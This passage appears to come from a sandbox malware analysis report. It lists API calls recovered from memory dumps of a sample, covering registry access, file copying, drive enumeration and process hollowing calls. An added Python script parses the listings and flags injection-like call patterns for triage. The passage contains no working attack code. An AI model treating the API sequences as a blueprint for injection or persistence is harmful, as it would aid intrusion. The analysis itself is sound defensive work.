  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
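The listings above are static call references recovered from the memory dump: one line per API, the module it was resolved from, the argument values the disassembler could see (`?` where it could not), and the address of the call. Reading them by hand is slow, and the hex constants (`80000001`, `00000040`, `80000000`) hide the interesting part. The script below is an added example, not part of this report and not Joe Sandbox code: it parses lines in exactly this format, decodes the few arguments whose parameter mapping is unambiguous (registry hive for `Reg*Key*`, access mask for `OpenProcess`, access and disposition for `CreateFile*` when all seven parameters are listed), and flags API combinations that merit a closer look. The constant tables are standard Win32 SDK values; the pattern descriptions are this example's own triage heuristics, not sandbox signatures, and the sample input is copied from the function listings above. One caveat the code also states: the static argument lists do not always map one-to-one to the API's parameters (compare the six arguments shown for the seven-parameter `DuplicateHandle`), so positional decoding is only applied where the mapping is clear.

```python
import re
from dataclasses import dataclass, field

# One listing line, e.g. "OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802",
# "memset.NTDLL ref: 001DC393" or "Part of subcall function 001D8325: <call>, ref: ...".
LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<callee>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,? ref: (?P<ref>[0-9A-F]{8}))?$"
)

# Win32 constants (SDK header values) for the few arguments decoded below.
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
PROCESS_RIGHTS = {0x0002: "PROCESS_CREATE_THREAD", 0x0008: "PROCESS_VM_OPERATION",
                  0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
                  0x0040: "PROCESS_DUP_HANDLE", 0x0400: "PROCESS_QUERY_INFORMATION"}
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

# API sets worth a second look when they occur in one function. These are this
# example's own triage heuristics, not Joe Sandbox signatures.
PATTERNS = [
    ({"SuspendThread", "ResumeThread", "NtUnmapViewOfSection"},
     "suspend/unmap/resume: consistent with process hollowing or thread-context injection"),
    ({"OpenProcess", "IsWow64Process"}, "checks target process bitness (typical before injection)"),
    ({"CallNamedPipeA"}, "named-pipe IPC with another component"),
    ({"GetTempFileNameA", "DeleteFileA"}, "stages data in a temp file and deletes it afterwards"),
]


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    callee: str = ""                       # set for "Part of subcall function" lines
    notes: list = field(default_factory=list)


def hexval(text):
    """'80000001' -> 0x80000001; '?' or a literal such as '.dll' -> None."""
    try:
        return int(text, 16)
    except ValueError:
        return None


def decode_flags(value, table):
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table.keys())
    return "|".join(names + ([f"0x{rest:X}"] if rest else [])) or "0"


def parse_line(line):
    """Return a Call for an API line, None for headings and other report lines."""
    m = LINE_RE.match(line.strip().lstrip("•◦ "))
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    return Call(m["api"], m["module"], args, m["ref"] or "", m["callee"] or "")


def annotate(call):
    """Decode constants only where the argument-to-parameter mapping is unambiguous;
    the static listing does not always show every parameter."""
    a = [hexval(x) for x in call.args]
    if call.api.startswith(("RegOpenKey", "RegCreateKey")) and a and a[0] in HKEY:
        call.notes.append(HKEY[a[0]])
    elif call.api == "OpenProcess" and a and a[0] is not None:
        call.notes.append(decode_flags(a[0], PROCESS_RIGHTS))
    elif call.api in ("CreateFileA", "CreateFileW") and len(a) == 7:  # all 7 params listed
        if a[1] is not None:
            call.notes.append(decode_flags(a[1], GENERIC))
        if a[4] in DISPOSITION:
            call.notes.append(DISPOSITION[a[4]])
    return call


def scan_block(lines):
    """Parse one function's listing and return (calls, triage findings)."""
    calls = [annotate(c) for c in map(parse_line, lines) if c]
    apis = {c.api for c in calls}
    return calls, [desc for needed, desc in PATTERNS if needed <= apis]


# Sample input: lines copied from the function listings above (several functions).
INJECTOR_LINES = [
    "memset.NTDLL ref: 001DC393",
    "Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D",
    "Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E",
    "ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A",
    "SuspendThread.KERNEL32(?), ref: 001DC450",
    "Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67",
]
OTHER_LINES = [
    "OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802",
    "RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820",
    "DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846",
    "CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90",
]
```

`scan_block` takes the lines of one function's `APIs` section (sub-call lines included, since the callee's behaviour is part of what the function does) and returns the parsed calls with their decoded notes plus the list of matched patterns. On `INJECTOR_LINES` it decodes the `OpenProcess` mask as `PROCESS_QUERY_INFORMATION` (the minimum needed for `IsWow64Process`) and reports the suspend/unmap/resume and bitness-check patterns; on `OTHER_LINES` it decodes `PROCESS_DUP_HANDLE`, `HKEY_CURRENT_USER` and `GENERIC_READ`/`OPEN_EXISTING` but raises no pattern finding. Treat a finding as a pointer to the dynamic trace and the injected-process section of the report, not as a verdict by itself.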
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
